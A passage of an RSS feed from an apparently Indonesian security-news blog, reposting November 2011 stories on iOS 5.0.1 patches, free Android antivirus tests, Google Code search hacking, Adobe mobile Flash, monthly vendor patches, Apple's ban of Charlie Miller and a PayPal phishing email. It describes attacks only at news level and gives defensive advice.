Importantly, 5.0.1 also fixes a number of &lt;a href="http://support.apple.com/kb/HT5052" rel="nofollow"&gt;security flaws&lt;/a&gt;,  including a remote code execution (RCE) vulnerability involving font  handling, found by Erling Ellingsen of Facebook. RCE means that a  cybercriminal might be able to trick your device into running software  without asking you, even if you're just browsing the internet.&lt;br /&gt;
&lt;br /&gt;
Interestingly, Charlie Miller's recent and controversial &lt;a href="http://nakedsecurity.sophos.com/2011/11/09/apple-lets-security-researcher-into-app-store-then-throws-toys-out-of-cot/"&gt;App Store&lt;/a&gt; hole has also been patched. Miller &lt;a href="http://nakedsecurity.sophos.com/2011/11/08/apple%e2%80%99s-app-store-security-compromised/"&gt;showed how&lt;/a&gt; to write an innocent-looking App which, once approved by Apple, could fetch and run unapproved software.&lt;br /&gt;
&lt;br /&gt;
Miller was unceremoniously banned from the Apple Developer scene for  at least a year; there's no word from Apple, however, on whether he'll  be readmitted now the hole is fixed.&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://cydia.saurik.com/" rel="nofollow"&gt;&lt;img align="right" alt="" height="150" hspace="10" src="http://sophosnews.files.wordpress.com/2011/11/cydia-150.png?w=150&amp;amp;h=150" title="Cydia logo" vspace="10" width="150" /&gt;&lt;/a&gt;Jailbreakers  will be pleased to note that devices suitable for running a jailbroken  iOS5 - a list which sadly still excludes the iPhone 4GS and the iPad 2 -  can happily run a jailbroken iOS5.0.1.&lt;br /&gt;
&lt;br /&gt;
If you are a jailbreaker, however, note that there is not yet any way to go back to iOS5.0 once you've moved on to 5.0.1. &lt;br /&gt;
That means that you'll never be able to use Charlie Miller's  code-signing vulnerability for jailbreaking purposes in the future, for  example if an iPad 2 jailbreak appears which relies on it.&lt;br /&gt;
&lt;br /&gt;
And that leaves us with one question: should you update? &lt;br /&gt;
Some reports suggest that 5.0.1 brings with it a raft of &lt;a href="http://arstechnica.com/apple/news/2011/11/ios-501-update-causing-contact-wifi-headaches-for-some-users.ars" rel="nofollow"&gt;new problems&lt;/a&gt;, and that the update &lt;a href="http://allthingsd.com/20111111/apple-we-continue-to-investigate-iphone-battery-issues/" rel="nofollow"&gt;might not&lt;/a&gt;, after all, fix your battery issues.&lt;br /&gt;
&lt;br /&gt;
But these complaints are still anecdotal and unscientific, so if you  trust Apple and you're not into jailbreaking, I'd suggest updating to  5.0.1 as soon as you conveniently can.&lt;br /&gt;
&lt;br /&gt;
Ellingsen's and Miller's vulnerabilities may not have made it to  Apple's highlights list, but each of these bugs on its own can be  considered sufficiently important to warrant a prompt update.&lt;/div&gt;&lt;/span&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total><author>noreply@blogger.com (d'ZheNwaY)</author></item><item><title>Free Android antivirus software is 'useless,' says testing firm</title><link>http://dzhenway.slackerc0de.us/2011/11/free-android-antivirus-software-is.html</link><category>Android</category><category>Anvir/Virus</category><category>Apa Saja</category><category>Info</category><category>Malware</category><category>Ponsel</category><category>Security</category><category>smartphones</category><pubDate>Sat, 12 Nov 2011 12:53:00 +0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1090696245688506420.post-4651391791425672968</guid><description>&lt;h2&gt;The malware scanners from minor players typically catch less than 10 percent of malicious software&lt;/h2&gt;&lt;h2&gt;&lt;span class="print-link"&gt;&lt;/span&gt;&lt;/h2&gt;&lt;div style="background: none no-repeat scroll center top #ffffff; float: right; height: 182px; padding: 8px; position: relative; width: 243px;"&gt;&lt;img align="right" alt="Free Android antivirus software is 'useless,' says testing firm" height="182" src="http://www.infoworld.com/sites/infoworld.com/files/media/image/virus_alert_button_hp.jpg" width="243" /&gt;&lt;/div&gt;Consumers  and workers who install free Android antivirus scanners from relatively  unknown developers are mostly wasting their time, an independent  testing firm has found. "During our tests, we found out that the  majority of free products are -- to make it short -- useless," says  Andreas Marx, CEO of AV-Test. Of all the major mobile platforms, &lt;a href="http://www.infoworld.com/d/mobile-technology/android-malware-cesspool-and-users-dont-care-006"&gt;Android is at most risk for malware&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
The  German firm tested seven free antivirus applications for the Android  platform and found that the best program detected only one-third of  resident malware, and all others detected less than 6 percent.&lt;span class="fullpost"&gt; The best  performer, Zoner Antivirus Free, detected 8 of 10 malicious programs  during installation, while the other applications detected at most 1 of  the 10 malicious programs, according to the &lt;a href="http://www.av-test.org/fileadmin/pdf/avtest_2011-11_free_android_virus_scanner_english.pdf"&gt;firm's analysis&lt;/a&gt; (PDF).&lt;br /&gt;
&lt;br /&gt;
The  company tested Zrgiu's Antivirus Free, BluePoint Antivirus Free, GuardX  Antivirus, Kinetoo Malware Scan, LabMSF Antivirus beta, Privateer Lite,  and Zoner AntiVirus Free. Four of the free antivirus program did not  detect any of the 172 resident malicious programs used as a test base;  another detected only 2. The programs also had little success in  detecting malware during installation, with three of the programs  detecting no malware and three others detecting a single program. Zoner  Antivirus Free was the only standout of the bunch, detecting 32 percent  of resident malware and 80 percent of malware during installation.&lt;br /&gt;
&lt;br /&gt;
The  firm compared the results to antivirus offerings from established  security firms F-Secure and Kaspersky, which detected more than 50  percent of resident malware and blocked all 10 malware samples during  installation.&lt;br /&gt;
&lt;br /&gt;
The company plans to widen the testing for its next report to include antivirus programs from commercial vendors as well.&lt;br /&gt;
&lt;h2&gt;&amp;nbsp;&lt;/h2&gt;&lt;/span&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><author>noreply@blogger.com (d'ZheNwaY)</author></item><item><title>Anonymous and LulzSec trawl Google Code search for security holes</title><link>http://dzhenway.slackerc0de.us/2011/11/anonymous-and-lulzsec-trawl-google-code.html</link><category>Anonymous</category><category>Apa Saja</category><category>Attack</category><category>Cloud</category><category>Google</category><category>Hacking</category><category>Info</category><category>LulzSec</category><category>SQL-Injection</category><category>vulnerability</category><pubDate>Sat, 12 Nov 2011 12:50:00 +0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1090696245688506420.post-3184320022551599844</guid><description>&lt;div class="entry-content"&gt;&lt;a href="http://sophosnews.files.wordpress.com/2011/11/loic.jpg?w=170&amp;amp;h=410" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img alt="Low Orbit Ion Cannon" border="0" class="alignright size-full wp-image-98183" height="410" src="http://sophosnews.files.wordpress.com/2011/11/loic.jpg?w=170&amp;amp;h=410" title="Low Orbit Ion Cannon" width="170" /&gt;&lt;/a&gt;Exotically named hacking tools such as &lt;a href="http://en.wikipedia.org/wiki/LOIC" title="Low Orbit Ion Cannon"&gt;Low Orbit Ion Cannon&lt;/a&gt; and #RefRef have garnered &lt;a href="http://www.theregister.co.uk/2011/08/04/anon_develops_loic_ddos_alternative/" title="Anonymous unsheathes new, potent attack weapon"&gt;plenty of headlines&lt;/a&gt;  over the last few months but a new report suggests that the world's  favourite search engine might be an equally important weapon in the  arsenal of cyber-criminals and hacktivists.&lt;br /&gt;
&lt;br /&gt;
The report explains how a simple search on &lt;a href="http://www.google.com/codesearch" title="Google Code Search"&gt;Google Code&lt;/a&gt;  is all that's needed to uncover a wealth of information that can be  used to break into websites, cloud-based services and secure networks.&lt;br /&gt;
&lt;br /&gt;
Google's Code Search is a tool that makes it easy for those with  technical know-how to search the vast amount of computer code that is  publicly available online.&lt;br /&gt;
&lt;br /&gt;
Researchers from IT security consultancy Stach &amp;amp; Lui report that  hacking groups such as Anonymous and LulzSec are using Google Code  search for a number of nefarious activities.&lt;span class="fullpost"&gt;&lt;br /&gt;
&lt;br /&gt;
With a few well-crafted searches they can uncover passwords for cloud  services, configuration files for Virtual Private Networks and find  code&amp;nbsp; that is vulnerable to common website hacking tactics such as SQL  injection.&lt;br /&gt;
&lt;br /&gt;
While the findings provide a much-needed wake up call to online  businesses, admins and developers, they also offer a fascinating insight  into the motivation of hacking collectives such as Anonymous and  LulzSec.&lt;br /&gt;
&lt;br /&gt;
According to Stach &amp;amp; Lui ‘Google Hacking’, as the technique is  known, is believed to be Anonymous and LulzSec’s primary means of  identifying potential targets.&lt;br /&gt;
Rather than being motivated by politics or injustice, hacking groups  may simply be targeting organisations because Google Code search has  turned up a vulnerability too tempting to ignore, making them less  political action groups, more malicious 21st century &lt;a href="http://en.wikipedia.org/wiki/The_Wombles" title="The Wombles"&gt;Wombles&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
So what can online businesses do to protect themselves from these online, evil Uncle Bulgarias?&lt;br /&gt;
&lt;br /&gt;
The first line of defence is to make sure that developers are  following established best practice and that executives are creating a  culture where best practice is encouraged and supported. Including  passwords in code has always been a bad idea and techniques to prevent  and detect SQL injection vulnerabilities are well established.&lt;br /&gt;
&lt;br /&gt;
Businesses should also prepare so that if they are successfully  attacked after a data leak they don't lose their shirt. Data stored in  the cloud can be rendered useless to attackers by the simple expedient  of encrypting it.&lt;br /&gt;
&lt;br /&gt;
Stach &amp;amp; Lui warn that in the businesses using cloud services  should also take a close look at the small print; many cloud service  providers state that they don't accept responsibility for leaks.&lt;br /&gt;
&lt;br /&gt;
For more on this take a look at the Stach &amp;amp; Lui's &lt;a href="http://www.stachliu.com/slides/2011/Hacker%20Halted%202011%20-%20Pulp%20Google%20Hacking%20-%2027Oct2011.pdf" rel="nofollow" title="Pulp Google Hacking"&gt;Pulp Google Hacking presentation&lt;/a&gt;. &lt;/div&gt;&lt;/span&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><author>noreply@blogger.com (d'ZheNwaY)</author></item><item><title>Adobe says goodbye to Flash for mobile platforms</title><link>http://dzhenway.slackerc0de.us/2011/11/adobe-says-goodbye-to-flash-for-mobile.html</link><category>Adobe</category><category>Anvir/Virus</category><category>Apa Saja</category><category>Flash Player</category><category>Info</category><category>Malware</category><category>Ponsel</category><category>vulnerability</category><pubDate>Thu, 10 Nov 2011 12:08:00 +0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1090696245688506420.post-6245976536069406394</guid><description>&lt;div class="entry-content"&gt;&lt;a href="http://sophosnews.files.wordpress.com/2011/11/flashplayer1.jpg" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img alt="" class="alignright size-full wp-image-97507" height="165" src="http://sophosnews.files.wordpress.com/2011/11/flashplayer1.jpg?w=165&amp;amp;h=165" title="flashplayer1" width="165" /&gt;&lt;/a&gt;Adobe  product management team has sent a briefing to Adobe's partners  describing the future direction of the development for multi-platform  mobile application development tools.&lt;br /&gt;
&lt;br /&gt;
From the security point of view, the biggest and the most &lt;a href="http://www.zdnet.com/blog/perlow/exclusive-adobe-ceases-development-on-mobile-browser-flash-refocuses-efforts-on-html5/19226" rel="nofollow" title="Adobe is killing Flash player for mobile platforms"&gt;welcome news&lt;/a&gt;  is the announcement of the end of the development of Adobe Flash player  for mobile platforms, except for critical security and bug fixes.&lt;span class="fullpost"&gt;&lt;br /&gt;
&lt;br /&gt;
Unfortunately, even if the death of Flash for mobile platforms is  imminent, Flash for desktop platforms is still very much alive.  &lt;a href="http://www.sophos.com/support/knowledgebase/article/114198.html" title="APSB11-26 - Security updates available for Adobe for Adobe Flash Player"&gt;Adobe Flash vulnerabilities&lt;/a&gt;,  together with Java virtual machine and Adobe Reader vulnerabilities,  have been the most common causes for drive-by download malware  infections.&lt;br /&gt;
&lt;br /&gt;
It is yet uncertain what is the future of Flash on desktop, but let  us hope that the widespread acceptance of HTML5 will drive Adobe in the  right direction of killing Flash players on all remaining platforms.&lt;br /&gt;
&lt;br /&gt;
The move comes after a pressure by iPhone and iPad users which have  been frustrated by not being able to access websites built in Flash  since Apple announced its decision to exclude Flash support from iOS  based devices. &lt;br /&gt;
Was &lt;a href="http://www.apple.com/hotnews/thoughts-on-flash/" rel="nofollow" title="Steve Jobs thoughts on flash."&gt;Steve Jobs right about Flash&lt;/a&gt; after all?&lt;/div&gt;&lt;/span&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><author>noreply@blogger.com (d'ZheNwaY)</author></item><item><title>Adobe, Apple, Microsoft &amp; Mozilla Issue Critical Patches</title><link>http://dzhenway.slackerc0de.us/2011/11/adobe-apple-microsoft-mozilla-issue.html</link><category>Adobe</category><category>Apple iOS</category><category>Attack</category><category>Chrome</category><category>Info</category><category>Microsoft</category><category>Mozilla</category><category>Patch</category><category>Security</category><category>vulnerability</category><category>Windows</category><pubDate>Thu, 10 Nov 2011 12:06:00 +0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1090696245688506420.post-1355974731778719416</guid><description>&lt;b&gt;Adobe&lt;/b&gt;, &lt;b&gt;Apple&lt;/b&gt;, &lt;b&gt;Microsoft&lt;/b&gt; and &lt;b&gt;Mozilla&lt;/b&gt;  all released updates on Tuesday to fix critical security flaws in their  products. Adobe issued a patch that corrects four vulnerabilities in &lt;b&gt;Shockwave Player&lt;/b&gt;, while Redmond pushed updates to address four &lt;b&gt;Windows&lt;/b&gt; flaws. Apple slipped out an update that mends at least 17 security holes in its version of &lt;b&gt;Java&lt;/b&gt;, and Mozilla issued yet another major &lt;b&gt;Firefox&lt;/b&gt; release, Firefox 8.&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://krebsonsecurity.com/wp-content/uploads/2010/01/winicon.jpg" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img alt="" class="alignright size-full wp-image-409" height="123" src="http://krebsonsecurity.com/wp-content/uploads/2010/01/winicon.jpg" title="winicon" width="139" /&gt;&lt;/a&gt;The only “critical” patch from Microsoft this month is &lt;a href="http://go.microsoft.com/fwlink/?LinkId=229071" target="_blank" title="MS11-083"&gt;a dangerous Windows flaw&lt;/a&gt;  that could be triggered remotely to install malicious software just by  sending the target system specially crafted packets of data. Microsoft  says this vulnerability may be difficult to reliably exploit, but it  should be patched immediately. Information on the other three flaws &lt;span class="fullpost"&gt; fixed this week is &lt;a href="http://technet.microsoft.com/en-us/security/bulletin/ms11-nov" target="_blank" title="Microsoft Security Bulletin Summary for Nov. 2011"&gt;here&lt;/a&gt;. The fixes are available via Windows Updates for most supported versions of the operating system, including &lt;b&gt;XP&lt;/b&gt;, &lt;b&gt;Vista&lt;/b&gt; and &lt;b&gt;Windows 7&lt;/b&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;span id="more-12260"&gt;&lt;/span&gt;&lt;br /&gt;
Adobe’s Shockwave update also fixes critical flaws, but users should  check to see if they have this program installed before trying to update  it. To test whether you have Shockwave installed, visit &lt;a href="http://www.adobe.com/shockwave/welcome/" target="_blank" title="Shockwave Test"&gt;this page&lt;/a&gt;;  if you see an animation, it’s time to update. If you see a prompt to  install Shockwave, there is no need to install it. Mozilla Firefox users  without Shockwave Player installed may still see “Shockwave Flash”  listed in the “Plugins” directory of the browser; this merely indicates  that the user has Adobe’s Flash Player installed.&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://krebsonsecurity.com/wp-content/uploads/2010/04/shockwave.jpg" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img alt="" class="alignleft size-full wp-image-2614" height="120" src="http://krebsonsecurity.com/wp-content/uploads/2010/04/shockwave.jpg" title="shockwave" width="197" /&gt;&lt;/a&gt;The vulnerabilities fixed by this update exist in versions of &lt;i&gt;Shockwave 11.6.1.629&lt;/i&gt; and earlier. The latest version, &lt;i&gt;v. 11.6.3.633&lt;/i&gt;, is available &lt;a href="http://get.adobe.com/shockwave/" target="_blank" title="Get Shockwave"&gt;here&lt;/a&gt;.&amp;nbsp;  As I noted earlier this year, I haven’t had Shockwave on my system for  some time now and don’t seem to have missed it. I’m sure it has its  uses, but to me Shockwave is just another Adobe program that requires  constant care and feeding. What’s more, like Adobe’s Flash Player,  Shockwave demands two separate installation procedures for IE and non-IE  browsers.&lt;br /&gt;
&lt;br /&gt;
Hat tip to the &lt;a href="http://isc.sans.org/" target="_blank" title="SANS Internet Storm Center"&gt;SANS Internet Storm Center&lt;/a&gt; for the heads up on the &lt;a href="http://support.apple.com/kb/HT5045" target="_blank" title="Apple Support Doc HT5045"&gt;Java fix from Apple&lt;/a&gt;. This update, available via Software Update or Apple Downloads, essentially brings Snow Leopard and Lion up to date with the &lt;a href="http://krebsonsecurity.com/2011/10/critical-java-update-fixes-20-flaws/" target="_blank" title="Critical Java Update Fixes 20 Flaws"&gt;Oracle patches released last month in Java 6 Update 29&lt;/a&gt; (Apple maintains its own version of Java).&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://krebsonsecurity.com/wp-content/uploads/2010/06/firefoxicon.jpg" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img alt="" class="alignright size-full wp-image-3731" height="126" src="http://krebsonsecurity.com/wp-content/uploads/2010/06/firefoxicon.jpg" title="firefoxicon" width="126" /&gt;&lt;/a&gt;If you use Mozilla Firefox or Thunderbird, you may have noticed that Mozilla is pushing out &lt;a href="http://www.mozilla.org/security/known-vulnerabilities/firefox.html#firefox8" target="_blank" title="Known Vulnerabilities in Firefox"&gt;another major upgrade&lt;/a&gt;  that includes critical fixes to these programs; both have now been  updated to version 8. If you’re still running Firefox version &lt;i&gt;3.6.x&lt;/i&gt;, Mozilla has updated that to&lt;i&gt; 3.6.24&lt;/i&gt; (if anyone can help decipher &lt;a href="https://wiki.mozilla.org/Enterprise/Firefox/ExtendedSupport:Proposal" target="_blank"&gt;Mozilla’s timeline&lt;/a&gt;  for exactly how long it will continue to support this workhorse version  of Firefox, please drop a line in the comments below). Perhaps I’m  becoming a curmudgeon, but I’m growing weary of the incessant update  prompts from Firefox. It seems that almost every time I start it up it’s  asking to restart the browser or to remove plugins that no longer work  with the latest version. I’ve been gradually transitioning more of my  work over to &lt;b&gt;Google Chrome&lt;/b&gt;, which seems faster and  updates the browser and any installed plugins silently (and frequently  patches oft-targeted plugins like Flash Player even before Adobe  officially releases the update).&lt;/span&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><author>noreply@blogger.com (d'ZheNwaY)</author></item><item><title>Apple Bans Security Researcher Charlie Miller For Exposing iOS Exploit</title><link>http://dzhenway.slackerc0de.us/2011/11/apple-bans-security-researcher-charlie.html</link><category>Apa Saja</category><category>Apple iOS</category><category>Attack</category><category>Exploit</category><category>Hacking</category><category>Info</category><category>vulnerability</category><pubDate>Thu, 10 Nov 2011 12:02:00 +0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1090696245688506420.post-7264676098193677275</guid><description>The latest wave in the infosec world is that Apple has banned the well known security researcher – Charlie Miller – from it’s developer program for exposing a new iOS exploit.&lt;br /&gt;
&lt;br /&gt;
It’s not really the smartest move as I’m pretty sure anyone as smart as Charlie Miller still has plenty of options – use another person’s account, sign up another account with a different identity, hack the phone without the developer program access and so on..&lt;br /&gt;
&lt;br /&gt;
Really it’s quite a harsh move from Apple and it’s not going to make them any friends in the security industry.&lt;span class="fullpost"&gt;   &lt;br /&gt;
&lt;br /&gt;
    Apple has banned well-known security researcher Charlie Miller from its developer program, for creating an apparently benign iOS app that was actually designed to exploit a security flaw he had uncovered in the firmware.&lt;br /&gt;
&lt;br /&gt;
    Within hours of talking about the exploit with Forbes’ security reporter Andy Greenberg, who published the details, Miller received an email from Apple: “This letter serves as notice of termination of the iOS Developer Program License Agreement … between you and Apple. Effective immediately.”&lt;br /&gt;
&lt;br /&gt;
    Based on Greenberg’s follow-up story, Apple was clearly within its rights to do so. Miller created a proof-of-concept application to demonstrate the security flaw and how it could be exploited by malicious code. He then hid it inside an apparently legitimate stock ticker program, an action that, according to Apple, “violated the developer agreement that forbid[s] him to ‘hide, misrepresent or obscure’ any part of his app,” Greenberg wrote.&lt;br /&gt;
&lt;br /&gt;
    He quoted Miller, who works for security consultancy Acuvant, “I’m mad. I report bugs to them all the time. Being part of the developer program helps me do that. They’re hurting themselves, and making my life harder.” &lt;br /&gt;
&lt;br /&gt;
In a way though, you have to agree that Miller did violate the very specific developer program agreement by hiding the PoC inside a legitimate application. That probably wasn’t his smartest idea, but then again it’s helping Apple and he’s not doing it in a malicious way to infect people – he’s doing it as a security researcher.&lt;br /&gt;
&lt;br /&gt;
Apple should be more proactive on working with people like this, people who are actually fixing bugs in their products for free and improving the user experience.&lt;br /&gt;
&lt;br /&gt;
It’s the way Apple operates though, secretive, exclusive, domineering etc. If you don’t do things their way, screw you.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
    Miller, a former National Security Agency staffer, is a well-known “white hat” hacker (he made Network World’s recent list of “Security All Stars”), with expertise in Apple’s Mac OS X and iOS platforms, including the Safari browser, and in Android. Miller “has found and reported dozens of bugs to Apple in the last few years,” Greenberg noted. Miller reported the latest one barely three weeks ago, and it was Greenberg’s public account of it yesterday, in advance of a planned public presentation by Miller next week, that got the researcher kicked out of the developer program.&lt;br /&gt;
&lt;br /&gt;
    The vulnerability is a fascinating exercise in information security sleuthing. Miller uncovered a flaw introduced in Apple’s restrictions on code signing on iOS devices. Code signing is a process by which only Apple-approved commands run in device memory, according to Greenberg’s account.&lt;br /&gt;
&lt;br /&gt;
    Miller began to suspect a flaw when Apple released iOS 4.3 in March. He realized that to boost the speed of the mobile Safari browser, Apple for the first time had allowed javascript code from a website to run at a deeper level in memory. This entailed creating a security exception, allowing the browser to run unapproved code. According to Greenberg’s story, Apple created other security restrictions to block untrusted websites from exploiting this exception, so that only the browser could make use of it.&lt;br /&gt;
&lt;br /&gt;
    Miller wasn’t the only one to notice that Apple had done something different with Safari in iOS 4.3, but many didn’t understand what was actually happening. Various news sites and bloggers claimed that Web apps running outside of Safari, and its new Nitro javascript engine, were slower. Some suggested that Apple was deliberately slowing them down to make Web apps less attractive than native ones. &lt;br /&gt;
&lt;br /&gt;
The way in which Miller uncovered the flaw once again shows his technical brilliance – something which Apple really should be harnessing rather than turning away.&lt;br /&gt;
&lt;br /&gt;
A lot of people noticed changes with iOS 4.3, but couldn’t actually figure out what was going on. Well that’s what we know in the public realm anyway, no doubt the bad guys had their eyes on it and were digging in with much more malicious exploits.&lt;br /&gt;
&lt;br /&gt;
It basically seems like a way to bypass any kind of code validation by Apple and execute arbitrary code from an attack server – dangerous indeed.&lt;/span&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><author>noreply@blogger.com (d'ZheNwaY)</author></item><item><title>Fresh Phish disguised as a PayPal Urgent Account Review Notification</title><link>http://dzhenway.slackerc0de.us/2011/11/fresh-phish-disguised-as-paypal-urgent.html</link><category>Apa Saja</category><category>Attack</category><category>Hacking</category><category>Info</category><category>Paypal</category><category>Phising</category><category>Security</category><category>Spam</category><category>vulnerability</category><pubDate>Sun, 6 Nov 2011 13:32:00 +0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1090696245688506420.post-5870406306630997113</guid><description>&lt;div class="entry-content"&gt;&lt;img align="right" alt="No Phishing Creative Commons photo courtesy of alex_lee2001's Flickr photostream" height="250" hspace="10" src="http://sophosnews.files.wordpress.com/2011/11/ccnophish-alex_lee2001-250.jpg?w=250&amp;amp;h=250" title="No Phishing Creative Commons photo courtesy of alex_lee2001's Flickr photostream" vspace="10" width="250" /&gt;While  browsing the web this evening waiting for thotcon 0x3 general admission  tickets to go on sale, my wife's spidey senses were tingling when she  asked me, "Is this a scam?"&lt;br /&gt;
&lt;br /&gt;
Turning towards her monitor I see she has an email open inside her  webmail account. The email has a pretty good sense of urgency written  into it that compels the reader to follow the instructions provided and  protect their information.&lt;span class="fullpost"&gt;&lt;br /&gt;
&lt;img align="middle" alt="PayPal phish" height="307" hspace="10" src="http://sophosnews.files.wordpress.com/2011/11/paypalphish500.jpg?w=500&amp;amp;h=307" title="PayPal phish" vspace="10" width="500" /&gt;&lt;br /&gt;
It begins:&lt;br /&gt;
&lt;blockquote&gt;"As of the 3rd of November 2011, our security system has blocked unusual charges to a credit card linked to your account."&lt;/blockquote&gt;And concludes:&lt;br /&gt;
&lt;blockquote&gt;"Sincerely, PayPal Account Review Team"&lt;/blockquote&gt;Unfortunately, the average person who does not read Naked Security  might easily be duped of their PII (Personally Identifiable  Information).&lt;br /&gt;
&lt;br /&gt;
Phishing scams are nothing new. Hopefully, if people stopped falling for them, then perhaps the phishing scams might stop?&lt;br /&gt;
It really comes down to education and great protection (for when education fails).&lt;br /&gt;
&lt;img align="right" alt="Mal/Phish-A Sophos Anti-Virus detection" height="78" hspace="10" src="http://sophosnews.files.wordpress.com/2011/11/paypal_mal_phish-a250.jpg?w=250&amp;amp;h=78" title="Mal/Phish-A Sophos Anti-Virus detection" vspace="10" width="250" /&gt;The home use version of Sophos Endpoint Security and Control did a fantastic job of catching the attack as Mal/Phish-A.&lt;br /&gt;
&lt;br /&gt;
The home use version is available to Sophos customer's employees.  Check with your employer if the home use program is available at your  organization before installing Sophos software willy nilly.&lt;br /&gt;
&lt;br /&gt;
I spoke earlier in the week with a security professional who sent 500  spear phishing attacks internally to his colleagues. Of the 500 emails  sent, 25 people responded by completing the form and surrendering their  information. &lt;br /&gt;
While a 5% rate may seem small, he felt even 1% was too high. Education helped a lot, but not completely. Do you agree?&lt;br /&gt;
When read, this fresh phish posing as PayPal immediately puts the  recipient into an emotional state that their account was compromised and  their funds are in jeopardy which then clouds their judgement.&lt;br /&gt;
&lt;br /&gt;
Since PayPal is a trusted name in the electronic payments industry,  they of course have controls to prevent fraudulent transactions (but no  one is perfect). This phish takes advantage of that trust by explaining  that the breached account has been locked for your protection.&lt;br /&gt;
&lt;br /&gt;
&lt;img align="right" alt="Attached HTML phish file" height="218" hspace="10" src="http://sophosnews.files.wordpress.com/2011/11/review_html_ipsource300.jpg?w=300&amp;amp;h=218" title="Attached HTML phish file" vspace="10" width="300" /&gt;Now to regain access to your funds it's imperative to download the attachment and complete the form.&lt;br /&gt;
&lt;br /&gt;
After downloading and opening the attachment it will open your web  browser. As you can see, this web page looks very genuine and might  lower your guard into believing it really came from PayPal.&lt;br /&gt;
&lt;img align="middle" alt="PayPal phishing site" height="424" hspace="10" src="http://sophosnews.files.wordpress.com/2011/11/paypal-imposter500.jpg?w=500&amp;amp;h=424" title="PayPal phishing site" vspace="10" width="500" /&gt;&lt;br /&gt;
&lt;br /&gt;
There are a few mistakes in this poorly executed phish which caused education to prevail over emotion.&lt;br /&gt;
&lt;br /&gt;
The most basic one is that there isn't a PayPal email address associated with the inbox which received this phish.&lt;br /&gt;
&lt;br /&gt;
Another one to point out is that the (From: "PayPal") is really not from PayPal. &lt;br /&gt;
The phisher used a domain name pp-redacted-.com which based on a  whois look up doesn't have anything to do with PayPal. It belongs to an  instrumentation company out of Massachusetts that happens to have  similar initials as PayPal. &lt;br /&gt;
While my wife isn't a security professional or an expert with  computers, her education to not trust every email in her inbox (beyond  spam) triggered a gut feeling to think more clearly.&lt;br /&gt;
&lt;br /&gt;
If it doesn't feel right, then it's not. Go with your gut!&lt;br /&gt;
Until next time, stay safe and secure online.&lt;/div&gt;&lt;/span&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><author>noreply@blogger.com (d'ZheNwaY)</author></item></channel></rss>